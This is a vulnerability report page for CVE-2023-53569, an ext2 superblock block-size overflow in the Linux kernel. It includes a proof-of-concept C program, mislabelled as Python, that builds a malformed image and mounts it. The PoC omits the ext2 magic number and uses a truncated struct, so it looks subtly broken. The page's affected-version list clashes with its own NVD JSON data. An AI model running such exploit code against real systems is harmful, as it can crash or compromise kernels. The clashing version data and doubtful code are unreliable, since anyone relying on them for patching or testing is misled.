Security Vulnerability Report
中文
CVE-2023-53569 CVSS 7.8 HIGH

CVE-2023-53569

Published: 2025-10-04 16:15:52
Last Modified: 2026-03-21 01:02:41
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: ext2: Check block size validity during mount Check that log of block size stored in the superblock has sensible value. Otherwise the shift computing the block size can overflow leading to undefined behavior.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel 5.10.x < 5.10.198
Linux Kernel 5.15.x < 5.15.134
Linux Kernel 6.1.x < 6.1.56
Linux Kernel 6.4.x < 6.4.7
Linux Kernel 6.5.x < 6.5
Linux Kernel master分支(修复前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2023-53569 PoC - Craft a malicious ext2 filesystem image // with invalid s_log_block_size to trigger integer overflow #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <linux/fs.h> #define BLOCK_SIZE 1024 #define SUPERBLOCK_OFFSET 1024 struct ext2_super_block { unsigned int s_inodes_count; unsigned int s_blocks_count; unsigned int s_r_blocks_count; unsigned int s_free_blocks_count; unsigned int s_free_inodes_count; unsigned int s_first_data_block; unsigned int s_log_block_size; // <-- vulnerable field unsigned int s_log_frag_size; // ... other fields truncated }; int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "Usage: %s <output_image>\n", argv[0]); return 1; } // Create a minimal ext2 filesystem image int fd = open(argv[1], O_RDWR | O_CREAT | O_TRUNC, 0644); if (fd < 0) { perror("open"); return 1; } // Allocate space for the image (1MB) char buf[BLOCK_SIZE]; memset(buf, 0, sizeof(buf)); for (int i = 0; i < 1024; i++) write(fd, buf, BLOCK_SIZE); // Write superblock at offset 1024 lseek(fd, SUPERBLOCK_OFFSET, SEEK_SET); struct ext2_super_block sb; memset(&sb, 0, sizeof(sb)); sb.s_inodes_count = 16; sb.s_blocks_count = 1024; sb.s_free_blocks_count = 1000; sb.s_free_inodes_count = 10; sb.s_first_data_block = 1; // Set malicious s_log_block_size to trigger overflow // Valid range is 0-2, we set it to 64 to cause UB sb.s_log_block_size = 64; sb.s_log_frag_size = 64; write(fd, &sb, sizeof(sb)); close(fd); printf("[+] Malicious ext2 image created: %s\n", argv[1]); printf("[+] Attempting to mount to trigger CVE-2023-53569...\n"); // Try to mount (requires root) char cmd[256]; snprintf(cmd, sizeof(cmd), "mount -o loop %s /mnt/test 2>&1 || true", argv[1]); system(cmd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53569", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:52.460", "lastModified": "2026-03-21T01:02:40.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next2: Check block size validity during mount\n\nCheck that log of block size stored in the superblock has sensible\nvalue. Otherwise the shift computing the block size can overflow leading\nto undefined behavior."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.12.1", "versionEndExcluding": "4.14.316", "matchCriteriaId": "D699C9C4-744E-4AB5-AB68-087692749B73"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.284", "matchCriteriaId": "9112EE64-11F4-46DB-A041-95118F20F81B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.244", "matchCriteriaId": "79F47095-8BA3-495A-AED3-2CCA5F2838E6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.181", "matchCriteriaId": "F5B1726B-45AA-47F2-9261-6DC963E92248"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.113", "matchCriteriaId": "F3D5E1B5-AB9D-4ECC-8F11-F3E1BF761E27"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.30", "matchCriteriaId": "E9430E62-03EA-42E6-9E5E-BD1D5124D107"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.4", "matchCriteriaId": "26C54BF0-3EED-46D4-92A7-5F07F658B49B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:-:*:*:*:*:*:*", "matchCriteriaId": "6F62EECE-8FB1-4D57-85D8-CB9E23CF313C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:*", "matchCriteriaId": "4F76C298-81DC-43E4-8FC9-DC005A2116EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc3:*:*:*:*:*:*", "matchCriteriaId": "0AB349B2-3F78-4197-882B-90ADB3BF645A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "matchCriteriaId": "6AC88830-A9BC-4607-B572-A4B502FC9FD0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "matchCriteriaId": "476CB3A5-D022-4F13-AAEF-CB6A5785516A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0ebfaf14150f55550cffb1148ed3920143c7a69c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/22ab5fed07ad4b206ea910fd0132d1a0d4831584", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/451b98155be5dfee05bc6e7c8b30c0be4add3f71", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/62aeb94433fcec80241754b70d0d1836d5926b0a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/99f8a15af6c9f0653193104a9e70891f950c6001", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c2e7776843a953fd7e48895c3880c277f996193e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c4813f858e5c3e4c4659ce95385c1c400c593e1e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e6f4fb28890c1361e0db9eb1adee3fc04e7fe7f5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.